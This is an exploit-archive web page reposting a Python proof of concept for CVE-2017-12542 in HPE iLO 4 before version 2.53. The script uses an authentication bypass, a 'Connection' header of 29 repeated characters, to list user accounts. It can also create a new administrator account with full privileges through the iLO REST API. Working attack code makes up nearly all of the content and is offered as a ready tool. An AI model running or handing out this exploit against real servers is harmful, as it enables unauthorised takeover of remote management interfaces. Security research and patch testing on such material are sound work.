首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HPE iLO 4 < 2.53 - Add New Administrator User
来源:@reconbrx 作者:skelsec 发布时间:2018-02-11  
#!/usr/bin/env python
 
"""
Exploit trigger was presented @reconbrx 2018
 
Vulnerability found and documented by synacktiv:
https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html
 
Original advisory from HP:
https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us
 
Other advisories for this CVE:
https://tools.cisco.com/security/center/viewAlert.x?alertId=54930
https://securitytracker.com/id/1039222
 
IMPORTANT:
THIS EXPLOIT IS JUST FOR ONE OUT OF THE THREE VULNERABILITES COVERED BY CVE-2017-12542!!!
The two other vulns are critical as well, but only triggerable on the host itself.
 
 
"""
 
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import json
import urllib3
 
#all of the HP iLO interfaces run on HTTPS, but most of them are using self-signed SSL cert
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 
exploit_trigger = {'Connection' : 'A'*29}
accounts_url = 'https://%s/rest/v1/AccountService/Accounts'
 
 
 
def test(ip):
    
    url = accounts_url % ip
    try:
        response = requests.get(url, headers = exploit_trigger, verify = False)
    except Exception as e:
        return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))
 
    try:
        data = json.loads(response.text)
    except Exception as e:
        return False, 'Target response not as exected!, Exception data: %s' % (str(e),)
 
    return True, data
 
def exploit(ip, username, password):
    Oem = {
        'Hp' : {
            'LoginName' : username,
            'Privileges': {
                'LoginPriv' : True,
                'RemoteConsolePriv': True,
                'UserConfigPriv' : True,
                'VirtualMediaPriv': True,
                'iLOConfigPriv':True,
                'VirtualPowerAndResetPriv':True,
            }
        }
    }
    body = {
        'UserName':username,
        'Password':password,
        'Oem':Oem
    }
    url = accounts_url % ip
 
 
 
    try:
        response = requests.post(url, json=body, headers = exploit_trigger, verify = False)
    except Exception as e:
        return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))
 
    if response.status_code in [requests.codes.ok, requests.codes.created]:
        return True, response.text
    else:
        return False, 'Server returned status code %d, data: %s' % (response.status_code, response.text)
 
if __name__ == '__main__':
    import argparse
    import sys
    parser = argparse.ArgumentParser(description='CVE-2017-12542 Tester and Exploiter script.')
    parser.add_argument('ip', help='target IP')
    parser.add_argument('-t', action='store_true', default=True, help='Test. Trigger the exploit and list all users')
    parser.add_argument('-e', action='store_true', default=False, help='Exploit. Create a new admin user with the credentials specified in -u and -p')
    parser.add_argument('-u', help='username of the new admin user')
    parser.add_argument('-p', help='password of the new admin user')
 
    args = parser.parse_args()
 
    if args.e:
        if args.u is None or args.p is None:
            print('Username and password must be set for exploiting!')
            sys.exit()
        res, data = exploit(args.ip, args.u, args.p)
        if res:
            print('[+] Sucsessfully added user!')
        else:
            print('[-] Error! %s' % data)
 
    elif args.t:
        res, data = test(args.ip)
        if res:
            print('[+] Target is VULNERABLE!')
            for i in data['Items']:
                print('[+] Account name: %s Username: %s' % (i['Name'], i['Oem']['Hp']['LoginName']))
        else:
            print('[-] Error! %s' % data)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Marked2 - Local File Disclosur
·HiSilicon DVR Devices - Remote
·Dahua Generation 2/3 - Backdoo
·Herospeed - 'TelnetSwitch' Rem
·Adobe Coldfusion 11.0.03.29286
·Asterisk 13.17.2 - 'chan_skinn
·MalwareFox AntiMalware 2.74.0.
·Cisco ASA - Crash PoC
·Geovision Inc. IP Camera & Vid
·Geovision Inc. IP Camera/Video
·Hava Tahmin 1.0 Database Discl
·Hazir Site 2.2 Database Disclo
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved